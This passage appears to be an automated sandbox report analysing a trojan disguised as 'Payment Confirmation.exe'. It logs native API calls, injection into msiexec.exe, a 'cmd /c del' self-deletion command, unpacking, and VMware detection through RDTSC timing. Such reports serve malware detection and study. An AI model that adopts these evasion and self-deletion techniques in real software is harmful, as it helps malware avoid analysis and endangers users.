          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_0041B8B3
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_0041D1E9
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_0041C983
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_0041D247
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_0041D352
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_0041CB6E
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_0041CBE6
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_0041C3B0
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_00408C4B
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_00408C90
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_0041CCB8
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_044F841F
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_045A1002
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_044FB090
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_045B1D55
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_044EF900
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_044E0D20
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04504120
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_044FD5E0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04506E30
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0451EBB0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0046D1E9
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0046C983
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0046D247
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0046D352
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0046CB6E
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0046CBE6
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00458C4B
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00458C90
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0046CCB8
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00452D89
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00452D90
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00452FB0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 044EB150 appears 32 times
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 4_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_045295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_045299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_045296D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_045296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0452B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_045298F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_045298A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0452AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_045299D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_045295F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0452A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0452A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_04529730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0452A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_045297A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004685D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00468680 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00468700 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004685CA NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0046867A NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00468623 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004686FA NtClose,
          Source: Payment Confirmation.exe, 00000001.00000003.361229670.000000000F196000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Confirmation.exe
          Source: Payment Confirmation.exe, 00000004.00000002.438024069.0000000000C0F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Confirmation.exe
          Source: Payment Confirmation.exe, 00000004.00000002.438309815.0000000000E6F000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenamemsiexec.exeX vs Payment Confirmation.exe
          Source: Payment Confirmation.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
          Source: Payment Confirmation.exe | Virustotal: Detection: 24%
          Source: Payment Confirmation.exe | ReversingLabs: Detection: 20%
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | File read: C:\Users\user\Desktop\Payment Confirmation.exe
          Source: Payment Confirmation.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Process created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Process created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | File created: C:\Users\user\AppData\Local\Temp\nse1E08.tmp
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/2@11/8
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Payment Confirmation.exe | Code function: 1_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3800:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: msiexec.pdb source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: Payment Confirmation.exe, 00000004.00000002.438290968.0000000000E60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000001.00000003.364311124.000000000F080000.00000004.00000001.sdmp, Payment Confirmation.exe, 00000004.00000002.437196803.0000000000960000.00000040.00000001.sdmp, msiexec.exe, 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, msiexec.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Unpacked PE file: 4.2.Payment Confirmation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 1_2_1000A525 push ecx; ret
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 4_2_0041B87C push eax; ret
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 4_2_0041B812 push eax; ret
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 4_2_0041B81B push eax; ret
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 4_2_0041CBE6 push dword ptr [2E339416h]; ret
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0453D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0046B87C push eax; ret
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0046B812 push eax; ret
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0046B81B push eax; ret
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0046CBE6 push dword ptr [2E339416h]; ret
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0046B7C5 push eax; ret
Source: C:\Users\user\Desktop\Payment Confirmation.exe - File created: C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\msiexec.exe - Process created: /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 1_2_10008856 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Payment Confirmation.exe - RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Payment Confirmation.exe - RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\explorer.exe TID: 1908 - Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2880 - Thread sleep time: -34000s >= -30000s
Source: C:\Windows\explorer.exe - Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe - Last function: Thread delayed
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 4_2_004088E0 rdtsc
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 1_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 1_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 1_2_00402671 FindFirstFileA,
Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmp - Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000005.00000000.418633743.0000000008430000.00000004.00000001.sdmp - Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.414579080.00000000062E0000.00000004.00000001.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmp - Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.379564727.00000000082E2000.00000004.00000001.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000005.00000000.379564727.00000000082E2000.00000004.00000001.sdmp - Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.418633743.0000000008430000.00000004.00000001.sdmp - Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000005.00000000.370640534.000000000095C000.00000004.00000020.sdmp - Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 1_2_10009418 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 1_2_100098E2 GetProcessHeap,
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe - Process token adjusted: Debug
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 1_2_1001A402 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 1_2_1001A616 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 1_2_1001A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 1_2_1001A706 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Confirmation.exe - Code function: 1_2_1001A744 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04500050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0457C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0451A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045A2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045B1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0450746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04567016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045B4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045B740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045A1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04566C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044FB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0451002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0451BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0457B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0457B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045B8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045A14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04566CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044E9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04563884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044F849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0451F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0451F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045290AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04507D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04523D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0450B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04563540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0450C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044EC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044EB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044E9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0456A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04514D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0451513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045B8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04504120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04504120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044EAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04598DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044EB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044FD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045741E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04512990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0451FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0450C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0451A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04511DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045651BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045135A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045669A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045161A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04574257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044E9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044F766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0452927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0459B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045B8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044F8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04503A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0451A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044EC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04518E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044EAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0459FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044EE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045B8ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04528EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0459FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04512ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045136CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044F76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045116E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_04512AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0451D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0457FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_0451FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045646A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045B0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044FAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_045B8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044EDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe - Code function: 11_2_044FEF40 mov eax, dword ptr fs:[00000030h]
